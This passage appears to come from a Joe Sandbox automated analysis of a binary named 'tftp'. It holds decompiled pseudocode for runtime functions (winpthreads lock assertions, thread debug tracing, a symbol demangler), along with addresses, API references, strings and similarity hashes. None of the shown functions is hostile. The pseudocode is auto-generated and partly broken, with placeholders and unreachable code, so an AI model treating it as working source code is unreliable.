					if(_t167 < 0 || _t151 > 3) {
						_t132 = E004048D0(_t157 - 0x170);
						_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
					} else {
						_t150 =  &(_t120[0xb]);
						 *(_t157 - 0x164) = _t150;
						if(_t120[0xb] != 0x5f || _t120[0xc] != 0x5a) {
							 *_t161 = _t150;
							_t125 = _t157 - 0x170;
							_t134 = E004039F0(_t157 - 0x170, strlen(??), _t150);
						} else {
							 *(_t157 - 0x164) =  &(_t120[0xd]);
							_t125 = _t157 - 0x170;
							_t134 = E00405210(_t157 - 0x170, 0);
						}
						 *_t161 = 0;
						_t116 = E00403990(_t125, _t134, (0 | _t151 != 0x00000002) + 0x42);
						_t126 =  *(_t157 - 0x164);
						 *_t161 = _t126;
						 *(_t157 - 0x184) = _t116;
						_t117 = strlen(??);
						_t132 =  *(_t157 - 0x184);
						_t127 =  &(_t126[_t117]);
						 *(_t157 - 0x164) = _t127;
						_t136 =  *_t127 & 0x000000ff;
					}
				}
				L15:
				_t94 = 0;
				if(_t136 == 0 && _t132 != 0) {
					_t122 = _t157 - 0x13c;
					 *(_t157 - 0x3c) = 0;
					 *((char*)(_t157 - 0x38)) = 0;
					 *(_t157 - 0x2c) = 0;
					 *((intOrPtr*)(_t157 - 0x34)) =  *((intOrPtr*)(_t157 - 0x17c));
					 *(_t157 - 0x28) = 0;
					 *(_t157 - 0x20) = 0;
					 *(_t157 - 0x1c) = 0;
					 *(_t157 - 0x30) =  *(_t157 - 0x180);
					 *(_t157 - 0x24) = 0;
					E004063F0(_t122, _t132, 0x11);
					_t99 =  *(_t157 - 0x3c);
					 *_t161 = _t122;
					 *((char*)(_t157 + _t99 - 0x13c)) = 0;
					_t161[2] =  *(_t157 - 0x30);
					_t161[1] = _t99;
					 *((intOrPtr*)(_t157 - 0x34))();
					_t94 = 0 |  *(_t157 - 0x24) == 0x00000000;
				}
				return _t94;
				goto L31;
			}

0x0040b0fc
0x0040b0fc
0x0040b102
0x0040afa0
0x0040afa6
0x0040afa6
0x0040afa9
0x0040afb1
0x0040afb1
0x0040afb7
0x0040b1e8
0x0040b1e8
0x0040afab
0x0040afab
0x0040afaf
0x00000000
0x00000000
0x0040afaf
0x00000000
0x0040afa9
0x0040afc0
0x0040afc3
0x0040afc9
0x0040afce
0x0040afd4
0x0040afde
0x0040afe4
0x0040afee
0x0040aff8
0x0040affd
0x0040b006
0x0040b019
0x0040b01f
0x0040b029
0x0040b033
0x0040b042
0x0040b052
0x0040b057
0x0040b05d
0x0040b05f
0x0040b066
0x0040b06c
0x0040b072
0x0040b125
0x0040b12a
0x0040b1f0
0x0040b1f7
0x0040b200
0x0040b20e
0x0040b214
0x0040b228
0x0040b22a
0x0040b24b
0x0040b24b
0x0040b251
0x0040b257
0x00000000
0x00000000
0x0040b25d
0x0040b261
0x0040b267
0x0040b249
0x00000000
0x0040b274
0x0040b274
0x0040b274
0x00000000
0x0040b267
0x0040b22c
0x0040b232
0x0040b232
0x0040b22a
0x0040b200
0x0040b078
0x0040b078
0x0040b1cb
0x0040b1d3
0x0040b087
0x0040b08b
0x0040b08e
0x0040b094
0x0040b0a0
0x0040b0a3
0x0040b0b9
0x0040b280
0x0040b285
0x0040b28b
0x0040b298
0x0040b298
0x0040b0c8
0x0040b0cf
0x0040b0d4
0x0040b0da
0x0040b0dd
0x0040b0e3
0x0040b0e8
0x0040b0ee
0x0040b0f0
0x0040b0f6
0x0040b0f6
0x0040b078
0x0040b130
0x0040b130
0x0040b134
0x0040b140
0x0040b14b
0x0040b152
0x0040b156
0x0040b15d
0x0040b166
0x0040b16d
0x0040b174
0x0040b17b
0x0040b180
0x0040b187
0x0040b18c
0x0040b192
0x0040b195
0x0040b19d
0x0040b1a1
0x0040b1a5
0x0040b1af
0x0040b1af
0x0040b1b9
0x00000000

APIs

strlen.MSVCRT ref: 0040AFC9
strlen.MSVCRT ref: 0040B0A9
strlen.MSVCRT ref: 0040B0E3

Strings

Z__, xrefs: 0040B1B2
_, xrefs: 0040B087
_, xrefs: 0040AFB3
Z, xrefs: 0040B096

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_
API String ID: 39653677-4277869324
Opcode ID: be2cc6d4533e990535368ec1fde15f7ac9d3eaea828fac859a60b836dad3b9f0
Instruction ID: c25a73bb2e66cc63ab2b9b243bc15225db55743d3faf1459ecc042423800f073
Opcode Fuzzy Hash: be2cc6d4533e990535368ec1fde15f7ac9d3eaea828fac859a60b836dad3b9f0
Instruction Fuzzy Hash: 35512AB1D042198BDB20DF69C8947DEFBF1AF49304F0481AED458BB385DB794A898F85

Uniqueness

Uniqueness Score: -1.00%

Function 00412364, Relevance: 10.6, APIs: 7, Instructions: 83COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,004130E5,00000000), ref: 00412376
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,004130E5,00000000), ref: 0041239C
InterlockedExchangeAdd.KERNEL32(?), ref: 004123C7
ReleaseSemaphore.KERNEL32 ref: 004123EA
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,004130E5,00000000), ref: 004123F9

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlockedReleaseSemaphore
String ID:
API String ID: 3008583290-0
Opcode ID: 6c4d5efedf0cc177a85a83fdea391efd726cefdebc7c4cff3c4fd372bed6e2e0
Instruction ID: 526e0efe0ffb20314affe0915fcedbcacfa9a6466bcdc63c2c3570e50316c387
Opcode Fuzzy Hash: 6c4d5efedf0cc177a85a83fdea391efd726cefdebc7c4cff3c4fd372bed6e2e0
Instruction Fuzzy Hash: 2B21A1B2A083185BC310BF3E998529FB7E4EB84355F054A2EED98C7341D579C894878A

Uniqueness

Uniqueness Score: -1.00%

Function 00411680, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00411680(intOrPtr* __eax, void* __ecx, void* __edx, void* __esi) {
				intOrPtr _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				intOrPtr _t11;
				int _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t25;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr* _t36;
				int _t37;
				intOrPtr _t38;
				void* _t43;
				void* _t46;
				void* _t49;
				intOrPtr* _t50;
				intOrPtr* _t51;

				_t44 = __edx;
				_t43 = __ecx;
				_t50 = _t49 - 0x24;
				_t36 = __eax;
				_t46 = __edx;
				_t11 =  *0x41db28;
				if(_t11 == 0) {
					_t11 = E0041165C();
					 *0x41db28 = _t11;
				}
				 *_t50 = _t11;
				E00411108(_t43);
				if( *((intOrPtr*)( *_t36)) != 0xbab1f0ed ||  *((intOrPtr*)( *_t36 + 4)) <= 0) {
					_v28 = 0x30;
					_v32 = "c:/crossdev/src/winpthreads-svn6233/src/rwlock.c";
					_v36 = "(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)";
					_v40 = "Assertion failed: (%s), file %s, line %d\n";
					 *_t50 = __imp___iob + 0x40;
					_t16 = fprintf(??, ??);
					 *_t50 = 1;
					exit(??);
					_push(_t36);
					_t51 = _t50 - 0x18;
					_t37 = _t16;
					_t17 =  *0x41db28;
					if(_t17 == 0) {
						_t17 = E0041165C();
						 *0x41db28 = _t17;
					}
					 *_t51 = _t17;
					E00411108(_t43);
					if(_t37 == 0) {
						L12:
						_t38 = 0x16;
					} else {
						_t25 =  *_t37;
						if(_t25 == 0 ||  *_t25 != 0xbab1f0ed) {
							goto L12;
						} else {
							if(_t25 == 0xffffffff) {
								_t38 = 1;
							} else {
								 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + 1;
								_t38 = 0;
							}
						}
					}
					_t19 =  *0x41db28;
					if(_t19 == 0) {
						_t20 = E0041165C();
						 *0x41db28 = _t20;
						 *_t51 = _t20;
						E00411070(_t44);
						return _t38;
					} else {
						 *_t51 = _t19;
						E00411070(_t44);
						return _t38;
					}
				} else {
					 *((intOrPtr*)( *_t36 + 4)) =  *((intOrPtr*)( *_t36 + 4)) - 1;
					_t29 =  *0x41db28;
					if(_t29 == 0) {
						_t30 = E0041165C();
						 *0x41db28 = _t30;
						 *_t50 = _t30;
						E00411070(_t44);
						return _t46;
					} else {
						 *_t50 = _t29;
						E00411070(_t44);
						return _t46;
					}
				}
			}

0x00411680
0x00411680
0x00411682
0x00411685
0x00411687
0x00411689
0x00411690
0x004116e8
0x004116ed
0x004116ed
0x00411692
0x00411695
0x004116a2
0x004116f4
0x004116fc
0x00411704
0x0041170c
0x0041171c
0x0041171f
0x00411724
0x0041172b
0x00411730
0x00411731
0x00411734
0x00411736
0x0041173d
0x004117a0
0x004117a5
0x004117a5
0x0041173f
0x00411742
0x00411749
0x00411759
0x00411759
0x0041174b
0x0041174b
0x0041174f
0x00000000
0x00411778
0x0041177b
0x004117ac
0x0041177d
0x0041177d
0x00411780
0x00411780
0x0041177b
0x0041174f
0x0041175e
0x00411765
0x00411784
0x00411789
0x0041178e
0x00411791
0x0041179c
0x00411767
0x00411767
0x0041176a
0x00411775
0x00411775
0x004116ad
0x004116af
0x004116b2
0x004116b9
0x004116cc
0x004116d1
0x004116d6
0x004116d9
0x004116e5
0x004116bb
0x004116bb
0x004116be
0x004116ca
0x004116ca
0x004116b9

Strings

(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 00411704
0, xrefs: 004116F4
c:/crossdev/src/winpthreads-svn6233/src/rwlock.c, xrefs: 004116FC
Assertion failed: (%s), file %s, line %d, xrefs: 0041170C

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: (((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0)$0$Assertion failed: (%s), file %s, line %d$c:/crossdev/src/winpthreads-svn6233/src/rwlock.c
API String ID: 0-3892181083
Opcode ID: 6859eed6270cdfd57fa21aa70cf045537dea1905074ac8f7d954444ae66de55c
Instruction ID: 0de1830ed0054dea62a2ffb6e67b5fe638377eff0131beccddee2d3ff11999a3
Opcode Fuzzy Hash: 6859eed6270cdfd57fa21aa70cf045537dea1905074ac8f7d954444ae66de55c
Instruction Fuzzy Hash: 40213DB5A082018FDB10EF29D8C569A77E4AB05354F09896EE585CB325E73DECC4CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00410528, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00410566
printf.MSVCRT ref: 004105B0
GetCurrentThreadId.KERNEL32 ref: 004105C0
printf.MSVCRT ref: 004105E2

Strings

M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s, xrefs: 004105A9
M%p %d %s, xrefs: 004105DB

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CurrentThreadprintf
String ID: M%p %d %s$M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
API String ID: 2356641437-4089461704
Opcode ID: 567fab977fc18b249c3caf7e328feacc14546168815342d2bc81419cbe87e727
Instruction ID: 070dfaa7e841d7bf516cc16f2373e3bd1ff2401286d89dea365f7641fea10bb1
Opcode Fuzzy Hash: 567fab977fc18b249c3caf7e328feacc14546168815342d2bc81419cbe87e727
Instruction Fuzzy Hash: 03218CB8A08304AF8304DF16D18085BFBE5BFC9754F15896EE88887321D734E980CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004103B0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E004103B0(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				intOrPtr _t13;
				int _t17;
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t36;
				int _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;

				_t41 = __edx;
				_t46 = _t45 - 0x24;
				_t36 = __eax;
				_t43 = __edx;
				_t13 =  *0x41db1c;
				if(_t13 == 0) {
					_t13 = E00410280();
					 *0x41db1c = _t13;
				}
				 *_t46 = _t13;
				E00411108(_t40);
				if( *_t36 != 0xbab1f00d ||  *((intOrPtr*)(_t36 + 4)) <= 0) {
					_v28 = 0x3a;
					_v32 = "c:/crossdev/src/winpthreads-svn6233/src/mutex.c";
					_v36 = "(m_->valid == LIFE_MUTEX) && (m_->busy > 0)";
					_v40 = "Assertion failed: (%s), file %s, line %d\n";
					 *_t46 = __imp___iob + 0x40;
					_t17 = fprintf(??, ??);
					 *_t46 = 1;
					exit(??);
					_push(_t43);
					_push(_t36);
					_t47 = _t46 - 0x14;
					_t37 = _t17;
					_t44 =  *_t17;
					_t18 =  *0x41db1c;
					if(_t18 == 0) {
						_t18 = E00410280();
						 *0x41db1c = _t18;
					}
					 *_t47 = _t18;
					E00411108(_t40);
					_t20 =  *_t37;
					if(_t20 == 0 ||  *_t20 != 0xbab1f00d) {
						_t38 = 0x16;
					} else {
						_t8 = _t20 + 3; // 0x3
						_t41 = _t8;
						if(_t8 <= 2 ||  *((intOrPtr*)(_t44 + 0x14)) == 0) {
							_t38 = 1;
						} else {
							_t41 =  *((intOrPtr*)(_t20 + 4)) + 1;
							 *((intOrPtr*)(_t20 + 4)) =  *((intOrPtr*)(_t20 + 4)) + 1;
							_t38 = 0;
						}
					}
					_t21 =  *0x41db1c;
					if(_t21 == 0) {
						_t22 = E00410280();
						 *0x41db1c = _t22;
						 *_t47 = _t22;
						E00411070(_t41);
						return _t38;
					} else {
						 *_t47 = _t21;
						E00411070(_t41);
						return _t38;
					}
				} else {
					 *((intOrPtr*)(_t36 + 4)) =  *((intOrPtr*)(_t36 + 4)) - 1;
					_t30 =  *0x41db1c;
					if(_t30 == 0) {
						_t31 = E00410280();
						 *0x41db1c = _t31;
						 *_t46 = _t31;
						E00411070(_t41);
						return _t43;
					} else {
						 *_t46 = _t30;
						E00411070(_t41);
						return _t43;
					}
				}
			}

0x004103b0
0x004103b2
0x004103b5
0x004103b7
0x004103b9
0x004103c0
0x00410418
0x0041041d
0x0041041d
0x004103c2
0x004103c5
0x004103d0
0x00410424
0x0041042c
0x00410434
0x0041043c
0x0041044c
0x0041044f
0x00410454
0x0041045b
0x00410460
0x00410461
0x00410462
0x00410465
0x00410467
0x00410469
0x00410470
0x004104e8
0x004104ed
0x004104ed
0x00410472
0x00410475
0x0041047a
0x0041047e
0x00410488
0x004104a8
0x004104a8
0x004104a8
0x004104ae
0x004104c4
0x004104b7
0x004104ba
0x004104bb
0x004104be
0x004104be
0x004104ae
0x0041048d
0x00410494
0x004104cc
0x004104d1
0x004104d6
0x004104d9
0x004104e5
0x00410496
0x00410496
0x00410499
0x004104a5
0x004104a5
0x004103d9
0x004103dd
0x004103e0
0x004103e7
0x004103fc
0x00410401
0x00410406
0x00410409
0x00410415
0x004103e9
0x004103e9
0x004103ec
0x004103f8
0x004103f8
0x004103e7

Strings

(m_->valid == LIFE_MUTEX) && (m_->busy > 0), xrefs: 00410434
:, xrefs: 00410424
c:/crossdev/src/winpthreads-svn6233/src/mutex.c, xrefs: 0041042C
Assertion failed: (%s), file %s, line %d, xrefs: 0041043C

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID:
String ID: (m_->valid == LIFE_MUTEX) && (m_->busy > 0)$:$Assertion failed: (%s), file %s, line %d$c:/crossdev/src/winpthreads-svn6233/src/mutex.c
API String ID: 0-1670916974
Opcode ID: a5504a28d262a97642b7f9d351fb78117b874bc1dec34cd121adf054aef72b23
Instruction ID: 104fc5d36cbabc111708318719e4124f0061eb44d51ab2571077738d51021865
Opcode Fuzzy Hash: a5504a28d262a97642b7f9d351fb78117b874bc1dec34cd121adf054aef72b23
Instruction Fuzzy Hash: 9011F1B0B082018BD750EF2AA48569ABBE0AB04344F05886EE485CB315E778D8C1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041246C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041248E
fprintf.MSVCRT ref: 004124C9
GetCurrentThreadId.KERNEL32 ref: 004124D8
fprintf.MSVCRT ref: 004124FF

Strings

C%p %d V=%0X B=%d b=%p w=%ld %s, xrefs: 004124B9
C%p %d %s, xrefs: 004124EF

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %d %s$C%p %d V=%0X B=%d b=%p w=%ld %s
API String ID: 1384477639-3672207984
Opcode ID: 5cd6c086fcda58a5a0a85590b47de3dd060dc8c68f7314a9c1f4a4c8440a6289
Instruction ID: 934ee438d0d5361cb381c8d91afe1b0ac7a82cc4232cb4300590b5da685a142a
Opcode Fuzzy Hash: 5cd6c086fcda58a5a0a85590b47de3dd060dc8c68f7314a9c1f4a4c8440a6289
Instruction Fuzzy Hash: 2711C5B4A093019FC700DF19D58455BBBE4AF88714F01896EF48887324D778E989CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC6C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0040DC6C(void* __edx, char* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr _t16;
				long _t18;
				int _t19;
				void* _t21;
				intOrPtr* _t23;
				long _t24;
				intOrPtr _t26;
				void* _t39;
				char** _t40;

				_t30 = __edx;
				_t16 =  *0x41db0c;
				if(_t16 != 0) {
					_t40 = _t39 - 0x20;
					if(_a4 == 0) {
						_t18 = GetCurrentThreadId();
						_v32 = _a8;
						_v36 = _t18;
						_v40 = 0;
						 *_t40 = "T%p %d %s\n";
						_t19 = printf(??);
					} else {
						 *_t40 = _a4;
						_t21 = E0040DBFC(__edx);
						 *_t40 = _a4;
						_t23 = E0040DBFC(__edx);
						_t24 = GetCurrentThreadId();
						 *_t40 = _a4;
						_t26 = E0040DBFC(_t30);
						_v24 = _a8;
						_v28 =  *((intOrPtr*)(_t21 + 0x14));
						_v32 =  *_t23;
						_v36 = _t24;
						_v40 = _t26;
						 *_t40 = "T%p %d V=%0X H=%p %s\n";
						_t19 = printf(??);
					}
					return _t19;
				}
				return _t16;
			}

0x0040dc6c
0x0040dc6c
0x0040dc73
0x0040dc78
0x0040dc81
0x0040dce0
0x0040dce9
0x0040dced
0x0040dcf1
0x0040dcf9
0x0040dd00
0x0040dc83
0x0040dc87
0x0040dc8a
0x0040dc96
0x0040dc99
0x0040dca0
0x0040dcab
0x0040dcae
0x0040dcb7
0x0040dcbb
0x0040dcbf
0x0040dcc3
0x0040dcc7
0x0040dccb
0x0040dcd2
0x0040dcd2
0x00000000
0x0040dcdc
0x0040dcdd

APIs

GetCurrentThreadId.KERNEL32 ref: 0040DCA0
printf.MSVCRT ref: 0040DCD2
GetCurrentThreadId.KERNEL32 ref: 0040DCE0
printf.MSVCRT ref: 0040DD00

Strings

T%p %d V=%0X H=%p %s, xrefs: 0040DCCB
T%p %d %s, xrefs: 0040DCF9

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CurrentThreadprintf
String ID: T%p %d %s$T%p %d V=%0X H=%p %s
API String ID: 2356641437-2059990036
Opcode ID: 9638e8fd650052fd177d7ec4de5c43e4cd59aabb4a8ee9d98042b9a9e94bbec9
Instruction ID: 7666521c92bfceb8188cd295e28d3376e92dfd3392eb2a32d2e4ac2cf38064c4
Opcode Fuzzy Hash: 9638e8fd650052fd177d7ec4de5c43e4cd59aabb4a8ee9d98042b9a9e94bbec9
Instruction Fuzzy Hash: 0311F7B0A09300AFC344EFAAD48195BBBE4BF84304F01882EF48497351D778D884DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411860, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041187F
printf.MSVCRT ref: 004118BD
GetCurrentThreadId.KERNEL32 ref: 004118CC
printf.MSVCRT ref: 004118EA

Strings

RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s, xrefs: 004118B6
RWL%p %d %s, xrefs: 004118E3

Memory Dump Source

Source File: 00000005.00000002.220019214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.220009208.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220049096.0000000000414000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.220056022.0000000000415000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.220075442.000000000041E000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tftp.jbxd

Similarity

API ID: CurrentThreadprintf
String ID: RWL%p %d %s$RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
API String ID: 2356641437-1971217749
Opcode ID: 1cae78b459183f8c34c1553847cb694f109f19984c6da57b966d27ba260b3f5b
Instruction ID: 79e4f3fb379c7912723b997b436733fc97d2d79da19831900ba9e07042a40af2
Opcode Fuzzy Hash: 1cae78b459183f8c34c1553847cb694f109f19984c6da57b966d27ba260b3f5b
Instruction Fuzzy Hash: 3101D3B49083019FD704EF16D09069BBBE1BF89714F10C85EE58887364D7389989CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1DC, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 109
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B1DC(signed char* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				signed int _t76;
				void* _t85;
				signed int _t88;
				signed char* _t93;
				signed int _t98;
				signed int _t110;
				int _t111;
				signed char* _t116;
				signed char* _t120;
				signed char* _t121;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t129;
				signed char* _t143;
				void* _t144;
				signed char* _t146;
				void* _t147;
				intOrPtr* _t149;
				void* _t150;
				signed char** _t151;
				void* _t154;

				 *_t149 = __ebx;
				 *(_t147 - 0x184) = __edx;
				_t76 = strlen(??);
				 *((intOrPtr*)(_t147 - 0x170)) = __ebx;
				 *(_t147 - 0x168) = 0x11;
				 *(_t147 - 0x164) = __ebx;
				 *(_t147 - 0x15c) = 0;
				 *(_t147 - 0x150) = 0;
				_t124 = _t76;
				 *((intOrPtr*)(_t147 - 0x16c)) = __ebx + _t76;
				 *((intOrPtr*)(_t147 - 0x158)) = _t124 + _t124;
				 *(_t147 - 0x14c) = _t124;
				 *(_t147 - 0x148) = 0;
				 *(_t147 - 0x144) = 0;
				 *(_t147 - 0x140) = 0;
				_t150 = _t149 - E0040CC90(0x00000012 + (_t124 + _t124 + _t124 * 0x00000004) * 0x00000004 & 0xfffffff0);
				_t85 = E0040CC90(0x00000012 + _t124 * 0x00000004 & 0xfffffff0);
				_t129 =  *(_t147 - 0x184);
				_t151 = _t150 - _t85;
				_t154 = _t144 - 1;
				 *((intOrPtr*)(_t147 - 0x160)) = _t150 + 0xc;
				 *(_t147 - 0x154) =  &(_t151[3]);
				if(_t154 == 0) {
					_t125 = 0;
					if(_t129 == 0x5f) {
						_t129 =  *(__ebx + 1) & 0x000000ff;
						 *(_t147 - 0x164) = __ebx + 1;
						if(_t129 == 0x5a) {
							 *(_t147 - 0x164) = __ebx + 2;
							_t118 = _t147 - 0x170;
							_t125 = E00405210(_t147 - 0x170, 1);
							if(( *(_t147 - 0x168) & 0x00000001) != 0) {
								while(1) {
									_t146 =  *(_t147 - 0x164);
									_t129 =  *_t146 & 0x000000ff;
									if(_t129 != 0x2e) {
										goto L9;
									}
									_t98 = _t146[1] & 0x000000ff;
									_t73 = _t98 - 0x61; // -7
									if(_t73 <= 0x19 || _t98 == 0x5f || _t98 - 0x30 <= 9) {
										_t125 = E00403B90(_t118, _t125);
										continue;
									} else {
										_t129 =  *_t146 & 0x000000ff;
										goto L9;
									}
									goto L25;
								}
							} else {
								_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
							}
						}
						L25:
					}
				} else {
					if(_t154 < 0 || _t144 > 3) {
						_t125 = E004048D0(_t147 - 0x170);
						_t129 =  *( *(_t147 - 0x164)) & 0x000000ff;
					} else {
						_t143 = __ebx + 0xb;
						 *(_t147 - 0x164) = _t143;
						if( *(__ebx + 0xb) != 0x5f ||  *((char*)(__ebx + 0xc)) != 0x5a) {
							 *_t151 = _t143;
							_t119 = _t147 - 0x170;
							_t127 = E004039F0(_t147 - 0x170, strlen(??), _t143);
						} else {
							 *(_t147 - 0x164) = __ebx + 0xd;
							_t119 = _t147 - 0x170;
							_t127 = E00405210(_t147 - 0x170, 0);
						}
						 *_t151 = 0;
						_t110 = E00403990(_t119, _t127, (0 | _t144 != 0x00000002) + 0x42);
						_t120 =  *(_t147 - 0x164);
						 *_t151 = _t120;
						 *(_t147 - 0x184) = _t110;
						_t111 = strlen(??);
						_t125 =  *(_t147 - 0x184);
						_t121 =  &(_t120[_t111]);
						 *(_t147 - 0x164) = _t121;
						_t129 =  *_t121 & 0x000000ff;
					}
				}
				L9:
				_t88 = 0;
				if(_t129 == 0 && _t125 != 0) {
					_t116 = _t147 - 0x13c;
					 *(_t147 - 0x3c) = 0;
					 *((char*)(_t147 - 0x38)) = 0;
					 *(_t147 - 0x2c) = 0;
					 *((intOrPtr*)(_t147 - 0x34)) =  *((intOrPtr*)(_t147 - 0x17c));
					 *(_t147 - 0x28) = 0;
					 *(_t147 - 0x20) = 0;
					 *(_t147 - 0x1c) = 0;
					 *(_t147 - 0x30) =  *(_t147 - 0x180);
					 *(_t147 - 0x24) = 0;
					E004063F0(_t116, _t125, 0x11);
					_t93 =  *(_t147 - 0x3c);
					 *_t151 = _t116;
					 *((char*)(_t147 + _t93 - 0x13c)) = 0;
					_t151[2] =  *(_t147 - 0x30);
					_t151[1] = _t93;
